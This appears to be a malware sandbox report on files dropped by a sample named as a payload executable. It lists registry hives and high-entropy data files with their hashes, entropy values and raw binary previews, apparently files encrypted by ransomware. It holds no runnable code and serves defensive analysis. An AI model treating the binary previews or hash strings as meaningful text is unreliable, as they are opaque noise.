                                                                                                SHA-256:8FED0B8A32716B8FFFC9BAC60FFA795E3CE4CC31334B47E2B167ADD8C00E8F9C
                                                                                                SHA-512:E497BF4FB4FBDEC0FFABFC87CA24CE2A18F77C1A3A9B3FD4532927EB137F0448C3AF1CB305242DFC219EB160457B12F5604BBA78E1934B087DDE9BD9F985952B
                                                                                                Malicious:true
                                                                                                Preview:mozJS....4l....>.i...........O.3.tb)#...\R..F.q..O..=.SW.......O..Ncs..+t'..lB..K.H/2U...oO7......\....8E.H?..K.]..b.b..0:..0-st8[....P.N..j.|^..A4^` S.(y}tm..?...05#...i.......W+'..?ZI.w#...i...X....f!..Yr...?.J>W............ .....wE|._L...Z..k.npyX.87....9)>.V.@..|r.}.bd..S{.<.Cw'.$>._#/A........|6....hI...H.....8.A..._.)...)...,.x..K.,U.....v......5...(.Z....gS.NQb.f....L....o......|h....M.5...7&g.6.....s.#O.w...pZ..N...........Ku.d..=&.x5$nV....F.D. .....4...3...6..].".~f..r..p.*.. 5n...<.t....&...."..v....Z...n..GV..U..i..x.........../..3..v.#.._at.T.=P.....w...\......h.46..gr.P.o......x{.q[x<.....O..9...I&.:.(&.ci....A.0.h\5..].......y...^.&..*.6T......#.1.{.g.p.KQU.6~<.l...+..y$....p.TY.s......F.,WT..Ul....Y...{.|[...i.......8o5......\...dL.vJ.(..0u."Fz....4pL/.!....d.:.?.$...c........(.....[.=.h.wpw.g{.;.&.)i\.R.91O.....&.'@..o<...Q..r... !....wk...3_q.y...`.I;D]......1d.t&..]...........J#%8.D..x...ld E..{;...K.l.M.i.%...@e.H..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.977437188401846
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:CBp64fj0Jok/Hz0sbilyPTof2yZe714MPXFJbrmdDVXc6hpM9nucXYHbOGaUQvak:CBs4fyFmlyL0Ze7+MJPmfhi9nyyGOvak
                                                                                                MD5:0D59F15C599ECA326FA75CBDF187898F
                                                                                                SHA1:A92EA30F5F61381B55DF6DE9A908555730312FFC
                                                                                                SHA-256:D84F37818C058FBBEEA2A3FF3ADB5A5D9A4755C1C93382CAD3437DD6E1699687
                                                                                                SHA-512:492DD8880164562C97416491A9357F1853C900959E442EDE29DE41B7AF7A2688ACFE74E7E65B45E8269AE472D596B3A1B769082998E6E839679C8D4042A529E2
                                                                                                Malicious:false
                                                                                                Preview:regf........h].g...c......<.].O..m...|.".&.\.v....@.[z.....@...h..DG&..,../z.......s.`.:.]$[.n......V*7....1.w.J.=....6.D.)..gJ.q..eL.w>R..[....,.....2!..w..?..A.....ZA.KW..o...4....l .~...2..a....^...Ao....."..z.af.Dgz..........B.*..k.l.o.....b.{.......a.w...)x...R..@.P.&(..D..h. '........@.b..7.c.|....N....KQt6xj.Y...u.G....:.P..s.%J.]J.4.(.<K0...z??...L'.s........B...8.'..h.........!...!.....gp.x.H_...`.Cpb...V......Qd|......7g...k.S..r\..4.W..M.R..a0T.:...*.?,....^.....aB../..6.......j....A.........EN... ....A...v&BRqu....S.....^...s.........}........h....t..(..f.:..S../Kt..eF..U...l.6'.JJ..|).A..H.{...@..q...Y.!;...9..F.x....u..UP.uO.Wy.K...DPu.I#fo@\............ZuFY....L<SX..(...#...cD.....".j..x~..8<+...|..?;..x.2f....&...p.....q.. .pz.M..Ny.........[,..*....D.e!..>..E..f.?.q.....5.R.O.c.>.@...T+*..7c..+..^7.c..!48.!a.$.L)..b...7}.;....P.33{E.z.h..-{.O..k...%H...IPM.V.j.1..7.g.........h$...Y...^@.. ......_..8.`!..0p
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.978971398686407
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:bkioRry3TFQCwOUZLPrSqs1cvgHjslXeHHOYqqJ4j:bkVry3hQmUZaqAjHANenO/
                                                                                                MD5:050724923CDE88CADF1C42F779238546
                                                                                                SHA1:3F5D8EBB43A8BB0D84BED5E31EF064800B511F02
                                                                                                SHA-256:C3DDCB7B2D514739DD262195174A6AD3424EAFE5AA76CC228E7C4DD6D98B1F10
                                                                                                SHA-512:D39CAF1C5B976C68423CDA35E0CFAC4F90C0B06FB07FEA058DD4871C79D1C3AC64BDA10F54C6A4A8ACE512F07BA8F7D2BDBF59DCB150559B9C1CE95207BB0CA3
                                                                                                Malicious:false
                                                                                                Preview:regf....q.ii..N...Z....O.&.]...8..Md.*.#[.dc4...m...W....QC....A...s...S.#r........I..@A.........j..<...S....*.........D.Wp.~.N..6..G.w5..A{.x..f.g..#_._.H./.s.[...BP......j...'..a[.(.-...i...P.s&...f..].O.0(p...:....nt.<.......#.[.F....Y...e..ud..V..Er....d...#..U.....9h.x...t.m2.ygl.]]g.......jD...........dS..E..40lkS...N...eMn#u..O.h'OzS..Gy....]f.|]q.......D.|! .....0....../Zv..%.&w.....s>.0.A..c.2.'..S.6m....Ekk.!.fr.....`..._.%.......J.:......!)*g.0.3.S.7..w$...c..Tw.6jP....K34..d3[.x..sfF.....n.}O..q..^@f5;....@Me.UON.......=.b.......d.i-..H....=.:[.Gj._.}`{.:.XuN~J....T.....&;..q.f.$/.........0=..'...2X.f.v=.2...wi...V..jK.....|./...+.gQJ.+.x`.e........!"n..Zg...kE..r.....7...x...9JC..n....K.b..0A..].....V.O..Ou1.c7...o(PF<....F..`P...U....(...O..%1...0.S..HY_P.Q.>.@(X..2..6u..qDb..D5{'..'W.V.k/A. .4..E.fT.YIB.'...d..]....*...T{.3...<.|"R.I..u..y....f3..x.d...d/.o...$O..^......O.k..k`z.*_.cw....JV....t...;.&>S..*.."..|+n.cs.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.979089673666845
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:U3lSaExkANvWj7vaBxElFp7CCCHjyzyCb4f0U6npBfXpf:BN7v8h62ZEcU6pBfXpf
                                                                                                MD5:642C613AFE6E1D81BA3031327CF2A3E3
                                                                                                SHA1:155A1CB573D257B7D3501B306C18E7B6200C7217
                                                                                                SHA-256:1DA4F1A0B1B3C8EBAC7EE1B66B530B45C83781E820DBE6D9D6CD15A5D6783F55
                                                                                                SHA-512:68D1A76F1D631163235610CB9113D793314004BD5BD57E958D4715C46879D1B611DC24C6743B4590467B778D651934D01EE1537BF9A857B948D43F95845F3E05
                                                                                                Malicious:false
                                                                                                Preview:regf..........]..Q.f...~r)..].....g....=.....?D..z.j.)...n~L.K=O.[w...)......"}..G..s.......8|......7..&.M.s,..v.:k......d.....*.....OM4..%.......S+Be.....g.."s.SB..}..U..S..+..C|F...d.?.....b.. ..m|.... hD...........#.41.0.u..ZdPC3...)~.......6....4.V. +!C....^Q..WC.... ...4/{T..(...........Mt.6U.F.<....7|......z...pH.n....0....... _,..`.Z.+.DY.r..l...aI.@.Ss1.K..G... .D&...f..[.f.9Bv\.....b.x]%..Gs.C7-U..4..D..4..=Qm?!oh.....8.:.0.<.......[.....fTP.<{..s5GB.c9\..k....ZX...$...t.J.C8^zq....%.X...@.!.O(/..2c.{A/..E..H.q.....)..6f.....IE..g\..B.D&SC........0)......WxN!..{:].kw....Ln..._...\....W..)....g..%J!.*k8.?.J;.E..m...z.9r...)S.Z....Z..eC.*.>:.h......F........P.......b.A..).5...J.V.d.I)......Y.o..Y..O...kac...eip..3^........bb.>...B[h]!.I.g...{.,9..L...M.....V.../$..aZl.'.x...Ub1...N.R67....[...........Ed.|).R...S(......3!H.;\.z.....i..Z.|.C.y<..VU.....)2Wu.......u.g.....)(......Z.0^. .:. .....Hyj$0.F........EEJ"..!.....2..iVy>..x..>.@..|....D
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2727
                                                                                                Entropy (8bit):7.933991629702441
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:+2obuR+sRgV5crQvGXPDg4fNwpxH362IZyW+8UX8gT5wckyz7eP39xt/ZiQkLD:/R9SV5iQvePc4f+pxHKpZ48p25w47eFI
                                                                                                MD5:9BF7DA0FF4232F0EFD83182D3B7ADDF6
                                                                                                SHA1:8110E9C96A841A80E5BED1376E60D8B5364049E0
                                                                                                SHA-256:D2F43BC0578AB2E76E6D26E9FFEBBBBB06E36445F3C125E25719E873538E4F34
                                                                                                SHA-512:061C25C26851E891FCBC3923FE73B05380FB98048F740C10DCB360300AA79A7092B899A63F0FA195B71E6682A95C0A64C118B79E348EA394256929A9A52833B2
                                                                                                Malicious:false
                                                                                                Preview:.PNG....id._..Z.....4.{..xQ.?gDH..q .q...6.J...)..N.j.r./ZKc....................R....r.l..$f..rj....)\z.bPRN......ss<....&...q.......6.n..'.*....8..].sj.(.........#...y...z.{x.H}`=..c2..DJ4..3...AF5w.@p..... ..1...e....P.>/.....P.bT*}....,......B."..,d......../.X.$i.x&;...MLr....Q$.@...!t..9O..!..M....E..t.M..7.T....0..^......BJ.4.C.q../1...5.....RX.....;...H....f.....X...Z..[...D....\4.je..kK..P.D....U34.=....#~.<."...?..S18U.....J..;..*@}.j9.(....f/S..z.T..*...b....9..;.k<...|!.C...8Y..?X...)..{9F.........1.....7.[`.m.._....._i..{.....F....."9.1;......H.z.9TW#..G..k,.}O.L.pJ?..W.z...Y...dP...3F...:......p.S$@.XTh.>...K."...$~.'N..zZ.bpRX..>o...;U....g..p.KO.}.o7..%&m...L....?....}....d.4.lv)....r<...rPj^.vdn)..2...>......K..<.;....[...v.!.ZQ.w..jtea}...6...s....l.x...r?....$P.\7q...=.(K..8.9.k.:.Q....8.-.ef.tI....+5F.D..{..{...m..S.F.....v...7o.>.f.[S.+Z..^.b.. <.._^....q...[..-.FR..cd.u........qqt.....p....e.aBB.Uih..s..6...z...P.p%
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1961
                                                                                                Entropy (8bit):7.907454697318158
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:7AYqLK/lHUJqVUSTPDbd9IZlji1hJcK6eGMmxuTsULD:8IlHxUUPnIfji18yTJ
                                                                                                MD5:FE333EA7352283916C36D2917EBCC6D7
                                                                                                SHA1:8EDA0DCD7DFDB71E2BF2E0960FF731A4A098704B
                                                                                                SHA-256:EB0C66781707C375753EC30CA18EB54101154CC4D4185F8ABAE331CBFF5DCED6
                                                                                                SHA-512:18FF195C70479064CBBDEB5D718893EDF8AA8D53E5970F3D58D54E52546A2F45FCAB06296264197DA555D2A6D12D6C1BB6E2DD678DAAC4B19504B0B4CC128DA4
                                                                                                Malicious:false
                                                                                                Preview:.PNG.q.....@.f.Ki.O...e2[K}..&.P.S..#o]g.7.Tn=.|pd........H.7`HYX.....!...G.IhT..._'.O......s.]...ec.K......Q....M\.5...?R;{.\.sD..8..Zv2..M&P......n....M5.#%r..$GNv<...Kj]..........,(...I_.FNz9...w85.......R...O....b.B....F.._....g..`.1.[.G+u....g...*.Z...~...<..".N.!..|.Dy)...|...1.....v.......o... .....G...n....... .p...D..)..jgB'...o..x.4..."..s.c.!.Jty.Cj...d\.-...i'2{...W.(6Ys..b......u._...]..B.L....$^.L.....y....i.F..C.<Gy....D/G1I..7.........SKR..G*~.uL..z/9d....ub.1....t}i.B.Lu.#.e[nS`d.W....t./...70.....1..Z...wG.e..@../w.kRa.. ...O.hI2.Bd.(.l|...t.....`...~...Q.D.........F.9.DH./f(g..2..+...r:*....m.X cJW.<.4E...C.y.k.{.!.(...9....5..;.V.......L..3..^e.....j.j..wO......B.bD..ZT...gr....=..B..b...B..LK..p..J.z3.r......C...O.Y...j...K.X...'..Q..I+..h.].XB..@~.M..k.1.1....t...2....9.Z W..V .........x..P..z.M..l.........+s.'.E..:b@X......M.Q;.: ...d\..n.f..}k.........J.k..;E.........X.j_g..P.R.c|...q....:..g.....r.~+.....p<.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2735
                                                                                                Entropy (8bit):7.935400702829751
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:9FPMFSayTAm6f5AyR2BIPdd4TBMmXTsTAiyI7EuLQuJyenGJYiO8qcbhRtLD:9FPMFSNTA3f5AaQxDsAiyS/nGJFO8nbJ
                                                                                                MD5:CA64E3EC39FA1F78716FB5EE8E313168
                                                                                                SHA1:07246C113970B35E5940797FAA3863202F1BF54F
                                                                                                SHA-256:AE81CB48D0DA1A74259A06D07B75BA3B96714A320978FDF491A21C72DF7D8F15
                                                                                                SHA-512:42FECB78382D584DCCAD315D5CE993CBD80CA88512A5F1DA55A986F027B52B6AB1AE2A40D158E03F6E674B4F3A65A3911819B033813BC889328556914356AB2B
                                                                                                Malicious:false
                                                                                                Preview:.PNG.a.lx.@..3....{...ha.=(.. .\..4..Nm....8.1..z..]..Gj.....#..f.(=;....o/.H.<..W\..K..U.B.%...&2..H>...<.>......6..Y..v..btw.a..j....3..5.....8..."..qHm...C..os.QY.K.....N.:m+w.^/V C#....z...W..|..I...%..r...j.........%k... .~....XCOv.-..7].l.G`3....O=2Hx.m.lB.V._S..N...I..u9.I.v0.gL'...`...#].\D.Kh*Brm...>.....YX.............E...n.VuK.H...t.1|.e.F~!yr.+.|.~.1......c..l./..i..M.v....].kk..^..$Naf........a.......=...|...v...d]w.[...>sjS.r...j.wg./.H,...R.J?.=.u.........RhQ..V.n...-.!N......N.....CTE..f.;...7.I.+.5..1..xe.f...v.{.O;.$.Xm.0%o....O..:\I#.B..}.Z_*.8....3,.A._.S.)K.0i.&..s....{\.W..~..y..$...g......q..#...r..O:74B...g....&.....5....7[o..T3...'..+....b..#.(?&{k..i.-f.?D>t.QP..j~g...c..3..SjYP.._...k1..u..,LA.64.Q...W..qw_A.~E.p.4m?..ul....i.=..@......q..r...U..T.{.f<...O..js~g3.Rv..k...}......V.g.kXv.!....<:Sd..........?....k........)W.......z)....qW0O]Ow...8...,...f..9.dZ."B..........Ks+.2.....w8....l!s..6...gA.}.B-H.K....).."i.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1911
                                                                                                Entropy (8bit):7.900470164615857
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:frs5ch8wqfBuPcwPBAy2mtCzhAgyYnhIoE/firVkMDLD:fw5XwqMPBKHdAvYnyZirh
                                                                                                MD5:989AE933E5BA3E1A6688903800C62783
                                                                                                SHA1:FED4920E0CA008055C66230B2393805F4E999195
                                                                                                SHA-256:91B2A32DDD3615AB8CDFAC75036BC2251D45DD7A191BD8B389B9AE73DC5044EB
                                                                                                SHA-512:711DDDEB30BBF4C7B5A0770F50E4DE827FCA0CDCA6044F1EF38C9466D81E3468389B364392D9EE34560AF42FD2065F56114E0A878D2C618B5E4A45966363E108
                                                                                                Malicious:false
                                                                                                Preview:.PNG...b._....+...G.......:.18......b.\0.u+.........o^,L.U.....E,..H.,M...9.d...H........"Y.!.5.:.f4T.._.T!D.oj7...%`.2w..4o..0.GN...ot/"A.H%~r...~^)..~.z'....t{.Ko..A..P...h.zS.U?..=..I...1@..L.S...B.JM...f:.&=9j.^.K.Y.`zF....j.7-.8C..F.J...I. .[..B.|H?=...>z.l~...S;..7.......a...{9<.M..`V....|.....7......Y....v...<..d..#dh'..%~....<(n....%.....~....zd-.&.b..)......."\..7~1....g{\?.o>...XX>.....D.B>.......X\..r..a..ni..?..t..3.>.Pp..S....._.i.5.],..{.U....84.>.n.......U^.VK2;yi...D.U....'..$wv.{....TV'.G}....q{}.S...I'.i<.....OE!..h;X..j...Y.r...c......!.{.x0......!.{.4>...U..=...7.{V@.E...A..q\.u...|..+...`.oX../......9...!....L.!..]...>j....0..Oe"...1r....F.FS.l.~.G......7...........`vc.+..L...x./.k..+VIa.'~.E.KB....x.Q4.N...,..^.Rh.[./z...E...O..<....0.kU{..x. ;.^.l...os..%.mx@....c`O.c.....CWn.S...(IG...DB. *i..$.ky.3.W.A.{....*1..t..Q..;o.U.QI.3c.....%.&..|%...K...u....w...D....^.8.0q|M...h.+7u,....u....2Dn.=.5.....X.Z.8.}cU..UFHx.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1887
                                                                                                Entropy (8bit):7.876393576754131
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:CkkhNvY2j6JmYKHoZ2wn6o4zxCro8GtH7GOZNo14eLD:C13vY2j6JmTIZTax6GtiOZE
                                                                                                MD5:A13F457DAE22184E1E25C13930373FDF
                                                                                                SHA1:08DBFB1E633BC98468BD0D3A8B14A0CCE7EDB04D
                                                                                                SHA-256:DD6B4DAE937937C2B65CB233BAB0CB212E4396F14DCF32C289109050D1A15363
                                                                                                SHA-512:115286AF7A33BBC6A5DD4EC3F31AE23EAA49B6EA1BC35DB1AF010947593BDFD985DB864D27A719DCC8D68F8B4FFC3CDF54BEAC6B84C914507FC08C72021A9D16
                                                                                                Malicious:false
                                                                                                Preview:.PNG..V(......}W.dG.Q..iSy.[....c"....S.\...q...y..\..@.|p.fIv..n..[.-.....Ay...!v.. .s.L....`.%%..!K.....,.`FC..~N..l'-YwS[+........\%7.1.R.....p.,3.gu.=..[.xm..,..O.k| V..rn[C&.........y7.x'.....D..... .8..Yn.........<d._..3.aqQ..!..J...F8...'..e,...E.:....vc...8Tv.;...Q.._|.)z.>?y...P....#.%...VB+..U.......r...c.>sn....IO.Z..EXf.{..P=x<...+3..f$aKX$..........g."../.U..f.....I27..+;......C......R9.fqY...<.N*.*.o".~u..@.?.T.o..O.qz.(6.1f..L3.........&t...WB..k..Z.5$.@..W..L5..........X.L$*...R.}...QNU.M...E....A.U..$.I-.[..s'.'Y....'...V............%....r.....s.i~.....%.....7Ka..NWA...?..dC.....ym.7......8...#)..D.*....f.sP.Y.3....Q....B.*@=.Z.h.3\...N.X3..v....R.8f.a~.&.."$..Y.3...I.\2(.......].>..H.|.4~*].O.......CeJ{3?.~.4z.\.G..$4i?Fk...}..3.#..9..:.q.5O....I..f@....*e9L........a.._.d...\........SEQ|t.. .J.T+D]..._...@*%4..y..q..u"..s.Y..r,...x/k....4WUA:.!.4....2'b......c6..,.o.<BDt.T.dP.X.....>..UQ.._-..3<..\}K;.....^.t....,%.j
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1447
                                                                                                Entropy (8bit):7.868290501992241
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:G5m/Xsj+/eZ+ns4gfjpyGJ8Zs17umdac7h4YJalvcWIHKMSmc7aL+i8jvxezLCSl:H/a+/K+nmbph8IumptFwt7MQGSi8jvCf
                                                                                                MD5:FD1F137C1AFFA08B490C0D74177CD2F6
                                                                                                SHA1:861562FC1612F56D5501712C1702B1AF8B910752
                                                                                                SHA-256:4727CDC202D33F4CB3B4A8D1C62FF215ADC4B3EE07CDA6842EB94D46B99D5715
                                                                                                SHA-512:41B8B705DF11AEEDBAE09097B4E7BC596B34C95DCC466D283130B6D3F303749EDAD9C2CB0163C561A8595E4678DF86A89822F073E2BCF5B7F410DB5FB59B0057
                                                                                                Malicious:false
                                                                                                Preview:.PNG..8./ ..g.....!+..t.mt.y....0........`..L.*7 9.......J,5.i.........w..Bm=.q..3.[..o..u..;.Q......u.R.;.LP.Q..;... 0...)..X.#...C......6.I(.<...*4.k... N......oAw..q?`.....e W8...n..2.WaT.[..v...H/..D|n@s.sb..E.F.a...hi.?X...^....8pw.0..SI.N#....C8....U.D.[\G9(...'..y.....hM.2.%..~. o.d....g...}.......g..b^.$i..~..v!.(d.....-...O.........4*<..d.^..64.^.vfz.l...6F.......D.|.h...~<..>V..[...o."z........js...J..Z...P..4*.%.(.=MI_..4w3...S..Wb.(......"..H.i. A...3.v2Dd. r....].[..[c.-g)D..PH..gH..2....=..6.j....b...E.=r>.E....Y5.q...H>...d.3.4'..l!................l...~..;eK......W.{8-........N...@_........ds....%.....A.@)....TW.2E6.I....5.k...l...N...h.K]8.c.....9......d.z-#9L..ov.=..\..3...+.;.....a....Gd.q..5..1x.HZ..y=...eW\O..[..W.1..;#.........F'W6mT.}..@.:..R.!.....7.M.r.8.g.......KS.........Vi%...*....Vo{5.d.R.o.}9..x}h.._..X...}..Q.B{.".eD..H[....iI..}(..7.$_./pJ......+..T.p..dqg.&....rW...;...S#.....5...rB..Y.j<...8/...9....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1783
                                                                                                Entropy (8bit):7.877600310175207
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:gC4FqIGjiz6p52H+CFJkUGdblto/kgpRLD:f4FvGju6pkdMbbltos0
                                                                                                MD5:FBAA93F3454482E27BA15DCB813153F0
                                                                                                SHA1:B43AB4041E5EFB02112AFA344C60CE3B423D883E
                                                                                                SHA-256:BB58CA62C97D15FF4BFA3B59A51C0045A715460157EF2CA079A03746224DF6EB
                                                                                                SHA-512:7D6C04DA19CF5725A0CBFA35209C6E7BAF949CE39B81FCFB0A1EFA5E837345470CDDB40E2A4144E6F35807AB164E157BE7FDA4936FADD2F0F0CBC813D529D6D2
                                                                                                Malicious:false
                                                                                                Preview:.PNG..\g..s.r.i..V....v.+.HwK....n..zR?..$\....%]E.j.2......A.(A(.....dk...Q.,Bd..(.T.I..i.9..h.7....v...^..6.!.;....Y.2.E....+XY..^.l....D....J..>e....Jx{.H.!.`.o7..y.L...3..1i.yOSh....3a...X."..##.y............J...k%]h.Z.]p..9B T..ow....]Q`+2.2<./.&.....^.#n....6.D...o#z..]..`].>T.............N..3.$.L>.g...,.......Q.U.^.Lq(=...[...!....O..aw..G*...............7,....9...x..V.g.7'lT.?M.}.O...!...0J....*..g/...4J.*..- .......W.N.cE_.~.0U.3.9..S.'o...6..qY.........."IN.A$.....H.....].bF.&...Y..A?jp^b.{....=..Q:0L.'tc=...a.#.M.Z........`... V..ae...Da..B@#....U7.~.....^.................=.$...e..wC.....d.|x.6.A...IQ}>......hBS.EK2...l..i,W..V.*..>7.4.hW`[.H.Z..u......s.a...e...~.......l.y........b..3k..][I{.P^..#.."../=....A.........1......9O..y.B...mHy_.[.,....A....B...5....D%..G....}5.,..A....Z..x......K.01y..\CQ..fx..3z.......'h4.G.E'.C3b...7...6.[m...r7..?.jL.Q{'B4t.v,t....>...Q.H2;c..Soe8'..?./.w.5(....l..<.B1Z.sOl..e/.....X..d5^`z....3.S.N/..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1394
                                                                                                Entropy (8bit):7.85945054183528
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:6ReDBjyUu1kdut8H7Nx8U7yc8lh0ZQzLDv/OEPgXecdPUE2ARgyzw9Sx3bD:6IFjW+fxCc8/0AvOmSdPUORjw9mLD
                                                                                                MD5:F8EFE6D95EE5D5A12C24196A5FAB3744
                                                                                                SHA1:8B7F6FD6A9E11E3C80B95989A42675D7732887A7
                                                                                                SHA-256:6DD4D4FAE2D07F2650AAF5788C0456212E443510974C372F2DDCB81E36BF194A
                                                                                                SHA-512:FE4FA49095C419000687C9B308F786BB9F5D6B080892438E8D2C6AFC4A1D3CE28EF9FF919945D856AB1BEAB28009C6C9981AC97066E4E7CD20A71B2A31CB2481
                                                                                                Malicious:false
                                                                                                Preview:.PNG...........8W-...-..>A{......V.f-..S{..v......Aqo.$&pr)LZg..{.,..g.R..v. ..S..tUK.j.s.e..+([7,.au...hD8.z.q,....7.@PH.,....&.f...V9.."..+<........%.[..~6........V......C..mxj.~@...sS......j."....m...,..T]f......l.,....w...7E.p..X4.....GM...N.du.....g....g.7.Q..g...5...@.........R......A.e..3.."..Fb.`.f.Vt:h9...Ms.q.......M.!.mg.3Z.=..6&'.H...^.e..@...\?{.....,....U8=j.....O)!.....B.5..B!*,.;...\X.X.+/>yZ...Y...g...KM....w.9.0G...b...... ..a..K....Xr......+......!i..[_.o?7....t;S..~>O{Y........jM..G.....=.......G=...A..j.......*....U.5...r5N........1.*<.D.,z../0..^.&.Z&.....T..ovzKWyOP....../3R!.'m.+:....v+.....8...m......4V..R.$6..5/4t...C.....+.=P....By.x..b.X..}C.x....F.U..M.yY..'3n..W..Jx..\...C.k@.P.....#.....a.!%.....K~..c.7=ufe..L.......`..B\...6Y@.+...85...aV.*.n_.....a...@F.f.d..A..1.;..bPl........wRR8.....E[...M.E.E4.......QD.`....K2Z'.....k..S...A5.C.I...E...E.'.k.o...^u....y..f.p...D.6(.0d...*.o....K.~..e...:...c...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1573198
                                                                                                Entropy (8bit):1.3860876145663268
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:YKtkOwdbe9liyJ59RIvCLG+EApjiJTZGjNWJkYtTosoFGpm0bZs0ZayZRuQayZRi:YqwbkFtuCq+7jimsJPt1MEds03BDc
                                                                                                MD5:688EA1EEE2DD47461E708B5415BF0B2F
                                                                                                SHA1:17C54B75F6DADD5A36868B60CBE238E172824A33
                                                                                                SHA-256:8A6A9065418B7A2AD800791CCE69026CE959F56EEFE96A686ACB656808AEE91E
                                                                                                SHA-512:24FA5942ED213C2F283282DA13CB2BE20B745F11556F13F3753BE9B588425E240C4B9E2564AA9A16F8985EFEF3A04F606E116449DF7F69EAE91ADB2F9417FA05
                                                                                                Malicious:false
                                                                                                Preview:o....6S...2@......@....I.\......6[...L.....e5...v.!h../.k.CV.....44....1....r^5.\.#Z^D..~n.%.....h..|........Z...T...Y..9...H73.Z...1.-iB.C..Z.>.f...|......J..M.B-....T.qa..V..7.Y.lL.p..3..w.cm...h.N>.Di.TL.b\#...Z..t.....J~..aI>._:..F..A.._.B..zn(..]J Y..{.K\...:af.4Xff8...R.`_o..........VY....(....\..f..b.5C...T..B./...=[Z.p-@.Q...2.....J.J.2....cL.n..C..../.&.A....4..t.Y....By\..6F.o.y.........D..}.xI...+5\..`...2..hA.....m..p....W....^.6.#z...@i.O..t...M. ......I..39t..bQ3.'9s...Q..4.I.|4....n.U.~q.b._.1.. ..b.q.8._U......(.F3..>l[I./\.V.+.1.V5..Y.f].MJ.t&.bVj5_dX.`...>.......M..R..\6./...r..oN..U...}.!...#7....0.9.q.U..oBV-.H.U.`.....I.p......%#z......1:Y,.......IA..\O..~}.L..w..v?..caI.R7..bc>lS:. .n..`.1D......z.u.#.w.vHwP2i^.R ..\p..{...+.*..=i..Y=.p...lT......5....kA.{..$P....7{<.c._';/..p..Y..w.#.... zVL7....n.....>.,D...p.X.9....<A......k...P+......Hq.Gq=....X.Y.!.o.....W8...I.....rVr.....0[..RMf..l...i.99+.G&u\3.l.=.<^....6.c.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16718
                                                                                                Entropy (8bit):7.990122365895612
                                                                                                Encrypted:true
                                                                                                SSDEEP:384:A82l6VZuOY4otp8rsIl4Ka5eQpL5nnFuB3Yg0FR80vy:Ak3uOtotpkpK9pL5nnFuBog0FCb
                                                                                                MD5:661DE4DAF46886E550765F803F3EA9D0
                                                                                                SHA1:A8A2280C7EA7732EDCF7D36F911F7C71C2D8AA29
                                                                                                SHA-256:D86B8337DF76050BDC0962835D70A0EDAC9812DF8A07BD8BD030AECF5F7270E4
                                                                                                SHA-512:2761A9E29CC8EF0AA9BED93907EA53C221F9C962C081FA1D252387502F817B0095844CFB39853BEB0A85F5DA428CFDB37945942AC5FF18F8C86A7C50B9EA591C
                                                                                                Malicious:true
